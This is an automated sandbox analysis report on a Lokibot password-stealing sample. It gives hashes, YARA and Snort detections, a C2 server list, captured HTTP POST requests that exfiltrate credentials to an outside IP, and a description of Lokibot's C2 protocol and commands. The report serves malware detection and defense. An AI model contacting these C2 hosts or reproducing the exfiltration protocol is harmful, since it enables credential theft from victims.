Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe
Analysis ID:1427765
MD5:4758a063f737c4cbd89a8ae27fe51f46
SHA1:33a78c132bdfcdcb1d55d26770942f076ff3dec8
SHA256:9b7d88f0ea7556298e0dee39226de3688d8df6d237bfdb6d7ecfa7a8dac85bdf
Tags:exeLoki
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains potential unpacker
.NET source code contains very large array initializations
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://24.199.107.111/index.php/0672554332862"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.2198862552.0000000002FD4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000003.00000002.2198531195.00000000010F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
        00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 31 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpackLoki_1Loki Payloadkevoreilly
                • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x133fc:$a2: last_compatible_version
                0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                • 0x123ff:$des3: 68 03 66 00 00
                • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                Click to see the 37 entries

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:04/18/24-06:25:19.005076
                SID:2025381
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:20.339429
                SID:2024312
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:20.339429
                SID:2021641
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:22.990627
                SID:2025381
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:20.339429
                SID:2024317
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:21.592442
                SID:2024318
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:21.592442
                SID:2021641
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:19.005076
                SID:2024312
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:21.592442
                SID:2024313
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:19.005076
                SID:2024317
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:22.990627
                SID:2024318
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:22.990627
                SID:2021641
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:21.592442
                SID:2025381
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:19.005076
                SID:2021641
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:20.339429
                SID:2025381
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:04/18/24-06:25:22.990627
                SID:2024313
                Source Port:49736
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://kbfvzoboss.bid/alien/fre.phpURL Reputation: Label: malware
                Source: http://alphastand.win/alien/fre.phpURL Reputation: Label: malware
                Source: http://alphastand.trade/alien/fre.phpURL Reputation: Label: malware
                Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://24.199.107.111/index.php/0672554332862"]}
                Multi AV Scanner detection for domain / URL
                Source: http://24.199.107.111/index.php/0672554332862Virustotal: Detection: 11%Perma Link
                Multi AV Scanner detection for submitted file
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeReversingLabs: Detection: 23%
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeVirustotal: Detection: 35%Perma Link
                Machine Learning detection for sample
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeJoe Sandbox ML: detected
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,3_2_00403D74
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 4x nop then jmp 02892F7Dh0_2_02893020

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49730 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49730 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49730 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49730 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49731 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49731 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49731 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.5:49731 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49735 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49735 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49735 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49735 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49736 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49736 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49736 -> 24.199.107.111:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.5:49736 -> 24.199.107.111:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://24.199.107.111/index.php/0672554332862
                Source: Joe Sandbox ViewIP Address: 24.199.107.111 24.199.107.111
                Source: Joe Sandbox ViewASN Name: TWC-12271-NYCUS TWC-12271-NYCUS
                Source: global trafficHTTP traffic detected: POST /index.php/0672554332862 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3CB79FB8Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/0672554332862 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3CB79FB8Content-Length: 180Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/0672554332862 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3CB79FB8Content-Length: 153Connection: close
                Source: global trafficHTTP traffic detected: POST /index.php/0672554332862 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3CB79FB8Content-Length: 153Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: unknownTCP traffic detected without corresponding DNS query: 24.199.107.111
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 3_2_00404ED4 recv,3_2_00404ED4
                Source: unknownHTTP traffic detected: POST /index.php/0672554332862 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 24.199.107.111Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 3CB79FB8Content-Length: 180Connection: close
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe, 00000003.00000002.2198531195.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe, 00000003.00000002.2198170282.000000000049F000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://24.199.107.111/index.php/0672554332862
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeString found in binary or memory: http://ocsp.comodoca.com0
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeString found in binary or memory: http://weather.yahooapis.com/forecastrss?w=4118
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeString found in binary or memory: http://www.ctvnews.ca/rss/business/ctv-news-business-headlines-1.867648
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeString found in binary or memory: http://www.ctvnews.ca/rss/ctvnews-ca-top-stories-public-rss-1.822009
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe, SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe, 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeString found in binary or memory: http://xml.weather.yahoo.com/ns/rss/1.0
                Source: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44b0e48.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.44cae68.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 3.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.2143047437.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000003.00000002.2198170282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.2143797691.00000000044CA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                Source: 00000000.00000002.2143797691.000000000444E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe PID: 4724, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe PID: 5780, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                .NET source code contains very large array initializations
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.2a95e3c.0.raw.unpack, LoginForm.csLarge array initialization: : array initializer size 33603
                Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exe.70f0000.5.raw.unpack, LoginForm.csLarge array initialization: : array initializer size 33603
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_071402E00_2_071402E0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_071420300_2_07142030
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_071432580_2_07143258
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_071434A00_2_071434A0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.18165.6818.exeCode function: 0_2_0287DDCC0_2_0287DDCC
